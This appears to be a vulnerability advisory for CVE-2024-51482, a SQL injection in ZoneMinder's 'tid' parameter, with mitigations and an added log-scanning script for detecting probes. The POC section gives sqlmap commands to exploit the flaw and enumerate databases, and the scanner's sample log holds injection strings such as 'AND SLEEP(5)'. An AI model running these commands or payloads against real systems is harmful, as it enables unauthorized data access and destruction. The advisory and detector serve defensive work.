Vulnerable Version
ZoneMinder v1.37.* <= 1.37.64
Fixed Version
Patched versions 1.37.65
Base Score
9.9 Critical
Vendor Description:
ZoneMinder is an open-source, free software program for closed-circuit television monitoring that was created to operate on Linux and FreeBSD and made available under the GNU General Public License (GPL).
ZoneMinder is controlled by users through an online interface. The application can make use of IP-based camera equipment or conventional cameras (via a capture card, USB, FireWire, etc.).
CVE-2024-51482 Vulnerability Description:
The flaw is a Boolean-based SQL injection in web/ajax/event.php, where inadequate validation of the “tagId” parameter permits direct manipulation of the SQL query. Researchers found that the “tagId” value is interpolated into SQL statements without proper security checks, so an attacker can exploit it with specially crafted requests.
For instance, an attacker could send a URL like http://hostname_or_ip/zm/index.php?view=request&request=event&action=removetag&tid=1 and inject SQL through the “tid” parameter to execute arbitrary SQL commands. These could include dangerous operations such as DELETE statements that destroy data, or SLEEP calls that induce Denial of Service (DoS) by slowing the database down.
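Detection logic for the request pattern described above, written from the defender's side: an added example that is not part of the advisory or of the ZoneMinder project. It assumes Apache/nginx combined-format access logs; the log lines themselves are constructed for the example.

```python
"""Flag probes of the CVE-2024-51482 request shape in web server access logs.

The advisory says the 'tid' value of the removetag action reaches SQL unchecked,
so a legitimate request carries a plain integer and anything else is suspicious.
Assumed: Apache/nginx combined log format. Sample lines are constructed.
"""
import re
from urllib.parse import parse_qs, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Tokens that appear in boolean/time-based probes; a quote or parenthesis in an id is enough.
SQLI_HINT = re.compile(r"(?i)\b(and|or|sleep|union|select|delete|benchmark)\b|['\";()-]")

# Constructed sample traffic: one benign removetag call, three probes, one unrelated request.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Nov/2024:12:00:01 +0000] "GET /zm/index.php?view=request&request=event&action=removetag&tid=1 HTTP/1.1" 200 57 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Nov/2024:12:00:02 +0000] "GET /zm/index.php?view=request&request=event&action=removetag&tid=1%20AND%20SLEEP(5) HTTP/1.1" 200 57 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Nov/2024:12:00:03 +0000] "GET /zm/index.php?view=request&request=event&action=removetag&tid=1%27 HTTP/1.1" 500 0 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Nov/2024:12:00:04 +0000] "GET /zm/index.php?view=events HTTP/1.1" 200 8812 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Nov/2024:12:00:05 +0000] "GET /zm/index.php?view=request&request=event&action=removetag&tid=abc HTTP/1.1" 200 57 "-" "Mozilla/5.0"',
]


def classify(line: str):
    """Return (ip, decoded tid, reason) for a suspicious removetag request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("path"))
    if not parts.path.endswith("/index.php"):
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)   # percent-decodes values
    if qs.get("request") != ["event"] or qs.get("action") != ["removetag"]:
        return None
    tid = qs.get("tid", [""])[0]
    if tid.isdigit():
        return None                                      # well-formed integer id
    reason = "sqli-hint" if SQLI_HINT.search(tid) else "non-integer-tid"
    return (m.group("ip"), tid, reason)


def scan(lines):
    """Run classify() over an iterable of log lines and keep the hits."""
    return [hit for hit in map(classify, lines) if hit]


if __name__ == "__main__":
    for ip, tid, reason in scan(SAMPLE_LOG):
        print(f"{ip}\t{reason}\ttid={tid!r}")
```

Feed it a real log with `scan(open(path))`; repeated hits from one source, or any hit after the patch window, are worth an alert rather than a log entry.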
Implications
The implications of this SQL injection vulnerability are substantial. It allows attackers to execute arbitrary SQL commands, potentially granting unauthorized access to sensitive data in the database. In a worst-case scenario, attackers could gain full control of the affected system, manipulate database entries, or cause service disruptions, threatening the operational integrity of the ZoneMinder deployment.
Mitigations
- Update ZoneMinder right away to version 1.37.65 or later, which contains the fix for this vulnerability.
- Security administrators should routinely harden and securely configure applications, databases, servers, and network equipment.
- System administrators must take regular backups and keep them offline or on a separate network.
- Users should create strong, unique passwords for every site, using a password manager, and enable Multi-Factor Authentication (MFA) wherever possible.
- Users should stay alert to phishing and social engineering tactics and refrain from downloading dubious apps or attachments.
POC
Although the command cannot be executed directly through the directory, after reading the documents, here is the URL:
http://hostname_or_ip/zm/index.php?view=request&request=event&action=removetag&tid=1
The tid parameter is vulnerable to SQL injection.
I used sqlmap to automate the exploitation process with this command:
sqlmap -u 'http://hostname_or_ip/zm/index.php?view=request&request=event&action=removetag&tid=1'

Then enumerate all databases:
sqlmap -u 'http://hostname_or_ip/zm/index.php?view=request&request=event&action=removetag&tid=1' --dbs

Reference:
https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-qm8h-3xvf-m7j3
